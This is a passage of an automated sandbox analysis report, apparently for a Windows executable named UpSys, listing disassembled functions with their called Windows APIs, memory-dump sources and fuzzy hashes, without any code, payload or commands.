                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                              • Opcode ID: a37637983cb8ed466fc21b937760a4454af69a19bf7da2cbbc37970e2af2f6f2
                                                                                                                                                              • Instruction ID: cb62ba5a12d71d2f9a9d2bba99e5b811318deef56be499ca0efddc7851522937
                                                                                                                                                              • Opcode Fuzzy Hash: a37637983cb8ed466fc21b937760a4454af69a19bf7da2cbbc37970e2af2f6f2
                                                                                                                                                              • Instruction Fuzzy Hash: 0211217221464086F7628F26E41879B7791F78C7B8F149314EBB9077E4CB7EC5499B40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400172F4 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EncodePointer$_initp_misc_winsig
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 190222155-0
                                                                                                                                                              • Opcode ID: 802ea9af00d2a9083b4f55c9abef19fb5ed45747d1adc9e57aa0fe4fa6613614
                                                                                                                                                              • Instruction ID: 181cb3827759b6d31fa573f47499f41296ef365d73474b38192af0c7bfaae4d4
                                                                                                                                                              • Opcode Fuzzy Hash: 802ea9af00d2a9083b4f55c9abef19fb5ed45747d1adc9e57aa0fe4fa6613614
                                                                                                                                                              • Instruction Fuzzy Hash: 3AF0A530A8164640EE0AFB6778223FC22501B9EBD4F4820357A1B0F2B3DD7AC052D740
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140029118 Relevance: 2.6, APIs: 2, Instructions: 81COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$ErrorLastPrivilegeRelease_errno
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1805546551-0
                                                                                                                                                              • Opcode ID: 340a2841d1d8cd4500852feded8bf0dc0fdc07ba848a4120238e834a8bec24a6
                                                                                                                                                              • Instruction ID: 0be6b64b1862092f2c20d0a153e9512bf94d4b7961e92515e9647c1095b0480c
                                                                                                                                                              • Opcode Fuzzy Hash: 340a2841d1d8cd4500852feded8bf0dc0fdc07ba848a4120238e834a8bec24a6
                                                                                                                                                              • Instruction Fuzzy Hash: DE316A36600A4181EB269F27F8457E933A5F78DBC0F988019EB49477B6DB79D961C300
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140016400 Relevance: 1.6, APIs: 1, Instructions: 111processCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcessTokenWith
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1742259849-0
                                                                                                                                                              • Opcode ID: 048ac07befcd929308ab0c36a801946155e7bae4014a0889a215a34181f61ec7
                                                                                                                                                              • Instruction ID: e4caa140bd1437213075a91a02dcc672534bfebe72d68e35dc5fe9013299e827
                                                                                                                                                              • Opcode Fuzzy Hash: 048ac07befcd929308ab0c36a801946155e7bae4014a0889a215a34181f61ec7
                                                                                                                                                              • Instruction Fuzzy Hash: 3641F676710E14C6EB22CF6AD8587AD2769F309BC4F564406EB1E0B7A4DB32CC91D300
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400120D0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                              • Opcode ID: 0431fbfb696a5ed98e55f6f8896b85b8e7c52a4f3296c9ccbe9d9ee22b25e5ef
                                                                                                                                                              • Instruction ID: c84cd93435f369f7a4a770a1c4b521bbe96fa09da5644c2465f1452d0059b149
                                                                                                                                                              • Opcode Fuzzy Hash: 0431fbfb696a5ed98e55f6f8896b85b8e7c52a4f3296c9ccbe9d9ee22b25e5ef
                                                                                                                                                              • Instruction Fuzzy Hash: 34311872614A8086E712EF56E8803DAB7A4FBD8785F900016BB8E4B6B6CB79C544CB40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400131C0 Relevance: 1.6, APIs: 1, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Param
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1698386829-0
                                                                                                                                                              • Opcode ID: aac143b44e6076abe9077671e41cc00f6be5b9a7b91d9899c258d11a230649ca
                                                                                                                                                              • Instruction ID: 9c2d627cc7aad84bc0ba5d3f0db1fe4051d83c9659375b72e6c4475985ec82b0
                                                                                                                                                              • Opcode Fuzzy Hash: aac143b44e6076abe9077671e41cc00f6be5b9a7b91d9899c258d11a230649ca
                                                                                                                                                              • Instruction Fuzzy Hash: 6C21C336614B88C6DB119F5AD490399B3B0F788F88F698016EB8E07775CF3AD846CB01
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140001380 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FullNamePath
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 608056474-0
                                                                                                                                                              • Opcode ID: 79a79fd8b69d133c831fa10cba0555cd870454c2b407628f1dfff46d86b420ab
                                                                                                                                                              • Instruction ID: fd6e2cdf866347a73401a3f49cda40a5b5de12a8f7424164657e7d13ded1bbf1
                                                                                                                                                              • Opcode Fuzzy Hash: 79a79fd8b69d133c831fa10cba0555cd870454c2b407628f1dfff46d86b420ab
                                                                                                                                                              • Instruction Fuzzy Hash: 09214F71218A8591EB23DF22F8943DAA365F78C3C4F844121FB4D4B5B6EA7CCA48C700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014003F2D0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                              • Opcode ID: aa67db7f22e3354abcb8b255564a6d065b37d7dd2d1340e24e45e88665f1bdfb
                                                                                                                                                              • Instruction ID: 03d378153705a55aadad6216413374d84fad4f99dd1a003041e7fed4bcb2f25e
                                                                                                                                                              • Opcode Fuzzy Hash: aa67db7f22e3354abcb8b255564a6d065b37d7dd2d1340e24e45e88665f1bdfb
                                                                                                                                                              • Instruction Fuzzy Hash: 8F01FE3222408086DB99CB2AE4903BE77E0E788788F545037F39B475A9CA3DC955CF10
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400593C0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Current_exceptionstd::exception_ptr::_
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3524498493-0
                                                                                                                                                              • Opcode ID: 3c23527668ac83a9a3b49b3bcf2c65412bf7c0965de15c614ceb8117b0632fc3
                                                                                                                                                              • Instruction ID: edab821f271fba202731b1a8bef3c310777cf5d0fe8303e65b1ed22df9522618
                                                                                                                                                              • Opcode Fuzzy Hash: 3c23527668ac83a9a3b49b3bcf2c65412bf7c0965de15c614ceb8117b0632fc3
                                                                                                                                                              • Instruction Fuzzy Hash: AEF08931604B4181EB52DF57F5413DA6351E78CFC4F498531BB5C47BAADE39C8524700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014003F110 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _fread_nolock
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 840049012-0
                                                                                                                                                              • Opcode ID: eaff6b967ea42677cdd0782c1dcc519a2c7cdd61f24055003808244374c399dc
                                                                                                                                                              • Instruction ID: 5cdec82d003f5761caa9f21392d164c29bffbf8cf784205feea0de96c6dff0cd
                                                                                                                                                              • Opcode Fuzzy Hash: eaff6b967ea42677cdd0782c1dcc519a2c7cdd61f24055003808244374c399dc
                                                                                                                                                              • Instruction Fuzzy Hash: 46F039B661058086EB218F66C0807ED6360E30CF89F18C432EF084B364DA39C49ACB24
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400133F0 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,0000000140033006), ref: 0000000140013422
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                              • Opcode ID: 12073493ebece98ca4bd8fc7625af26a0a2891a959e8e10718e80bd4bdc1a070
                                                                                                                                                              • Instruction ID: f52c837a63ee973e831f4a1daff7b23859135a2589c7a7ab020d04ae383bd09f
                                                                                                                                                              • Opcode Fuzzy Hash: 12073493ebece98ca4bd8fc7625af26a0a2891a959e8e10718e80bd4bdc1a070
                                                                                                                                                              • Instruction Fuzzy Hash: D5E0D833200A0082DB0A8F67F54036876A4E79CBF8F144311F775072E4CB74C4A18740
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 000000014001F270 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2118026453-0
                                                                                                                                                              • Opcode ID: 10d6e1b4221ec34b901ac4d6c479af476afbd8de7c556705d189609587d3ccbc
                                                                                                                                                              • Instruction ID: 0565f79b54bbb677d1be30ca3b6f5585288d21ce801995d89726260605da74d3
                                                                                                                                                              • Opcode Fuzzy Hash: 10d6e1b4221ec34b901ac4d6c479af476afbd8de7c556705d189609587d3ccbc
                                                                                                                                                              • Instruction Fuzzy Hash: B2D05B32B50A8482DB514B66F55039C33A4E78D7D4F588021E75C07655DA3DC895C700
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00000001400142D0 Relevance: 1.5, APIs: 1, Instructions: 203COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • free.LIBCMT ref: 0000000140035A54
                                                                                                                                                                • Part of subcall function 0000000140002C90: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,000000014003476B), ref: 0000000140002D62
                                                                                                                                                                • Part of subcall function 0000000140002C90: GetFullPathNameW.KERNEL32(?,?,?,?,?,?,000000014003476B), ref: 0000000140002D80
                                                                                                                                                                • Part of subcall function 0000000140002C90: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,000000014003476B), ref: 0000000140002DEA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000002C.00000002.381513233.0000000140001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                              • Associated: 0000002C.00000002.381489285.0000000140000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381856933.00000001400AD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381887531.00000001400AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381910678.00000001400B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381945884.00000001400C5000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381962555.00000001400C8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              • Associated: 0000002C.00000002.381978527.00000001400CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_44_2_140000000_UpSys.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CurrentDirectory$FullNamePathfree
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 521740188-0
                                                                                                                                                              • Opcode ID: 2a1036c45805ead9bf2a4ba91d1a02abacc2b53044582e8de7fbd9d9a9e758e4
                                                                                                                                                              • Instruction ID: a1985525532cf589c4841e569f1b3e3950d25d7531f99ad57d57b85bbee51fd8
                                                                                                                                                              • Opcode Fuzzy Hash: 2a1036c45805ead9bf2a4ba91d1a02abacc2b53044582e8de7fbd9d9a9e758e4
                                                                                                                                                              • Instruction Fuzzy Hash: E8917072224A4092EB52EF22F4417EEA360F7897D4F845112FB8A47AFADF38C545DB00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0000000140015120 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
